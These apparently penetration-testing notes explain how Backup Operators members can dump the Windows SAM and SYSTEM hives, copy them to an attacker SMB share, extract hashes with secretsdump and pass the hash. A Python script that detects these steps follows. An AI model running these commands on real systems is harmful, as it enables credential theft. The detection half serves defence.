
Backup Operators Group


Last updated 7 months ago

The SAM (Security Account Manager) database in Windows stores user account credentials, and the SYSTEM file holds the boot key necessary to decrypt these credentials. The Backup Operators group can bypass file permissions to back up sensitive files like these.

1. Backup SYSTEM and SAM Files

The hklm\sam and hklm\system registry hives correspond to the SAM and SYSTEM files.

reg save hklm\sam C:\temp\sam.backup
reg save hklm\system C:\temp\system.backup

2. Transfer the Files Using SMB

On your attacker machine, set up a simple SMB server with Impacket.

impacket-smbserver <share_name> <dest_folder_path> -smb2support

From the target machine, copy the backed-up files to the share on the attacker machine.

copy C:\temp\sam.backup \\<attacker_ip>\<share_name>\sam.backup
copy C:\temp\system.backup \\<attacker_ip>\<share_name>\system.backup

3. Extracting the hashes

Now that the SAM and SYSTEM files are transferred to the attacker machine, it's possible to extract password hashes from them using impacket-secretsdump.

impacket-secretsdump -sam sam.backup -system system.backup LOCAL

4. Pass The Hash

Pass The Hash
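Detection logic for the procedure above, written from the defender's side as an added example (not part of the original notes): it scans constructed process-creation events (Sysmon Event ID 1 / Security 4688 style; the `User` and `CommandLine` field names are assumed) for a `reg save`/`reg export` of the SAM or SYSTEM hive, going slightly beyond the page by also covering the SECURITY hive, and reports whether the same user then copied a file to a UNC share, which is the exfiltration step the notes use.

```python
import re
from typing import Dict, List

# "reg save" or "reg export" (reg.exe too) of the SAM, SYSTEM or SECURITY hive,
# in either the short (hklm\sam) or long (HKEY_LOCAL_MACHINE\SAM) form.
HIVE_DUMP_RE = re.compile(
    r'\breg(?:\.exe)?\s+(?:save|export)\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
    re.IGNORECASE,
)
# A copy/move of a file to a UNC path (\\host\share\...), as in the notes' transfer step.
UNC_COPY_RE = re.compile(r"\b(?:copy|xcopy|move|robocopy)\b.*\s\\\\[^\\\s]+\\[^\s]+", re.IGNORECASE)


def classify_event(event: Dict[str, str]) -> List[str]:
    """Return the detection tags that apply to one process-creation event."""
    cmd = event.get("CommandLine", "")
    tags: List[str] = []
    m = HIVE_DUMP_RE.search(cmd)
    if m:
        tags.append(f"registry_hive_dump:{m.group(1).lower()}")
    if UNC_COPY_RE.search(cmd):
        tags.append("copy_to_unc_share")
    return tags


def find_hive_dump_chains(events: List[Dict[str, str]]) -> Dict[str, dict]:
    """Per user: which hives were dumped and whether a UNC copy followed.
    Users who only copied to a share (no hive dump) are not reported."""
    per_user: Dict[str, List[str]] = {}
    for e in events:
        tags = classify_event(e)
        if tags:
            per_user.setdefault(e.get("User", "?"), []).extend(tags)
    findings: Dict[str, dict] = {}
    for user, tags in per_user.items():
        hives = sorted({t.split(":")[1] for t in tags if t.startswith("registry_hive_dump")})
        if hives:
            findings[user] = {"hives": hives, "exfil": "copy_to_unc_share" in tags}
    return findings


# Constructed sample events (not real telemetry); the last two are benign noise.
SAMPLE_EVENTS = [
    {"User": "CORP\\svc_backup", "CommandLine": "reg save hklm\\sam C:\\temp\\sam.backup"},
    {"User": "CORP\\svc_backup", "CommandLine": "reg  save HKLM\\system C:\\temp\\system.backup"},
    {"User": "CORP\\svc_backup", "CommandLine": "copy C:\\temp\\sam.backup \\\\10.0.0.5\\share\\sam.backup"},
    {"User": "CORP\\alice", "CommandLine": "reg query hklm\\software\\microsoft\\windows"},
    {"User": "CORP\\bob", "CommandLine": "copy report.docx \\\\fileserver\\public\\report.docx"},
]

if __name__ == "__main__":
    for user, finding in find_hive_dump_chains(SAMPLE_EVENTS).items():
        print(user, finding)
```

Pair this with a periodic review of Backup Operators membership: the hive dump is only possible because that group grants the backup privilege, so the group should hold no accounts that do not need it.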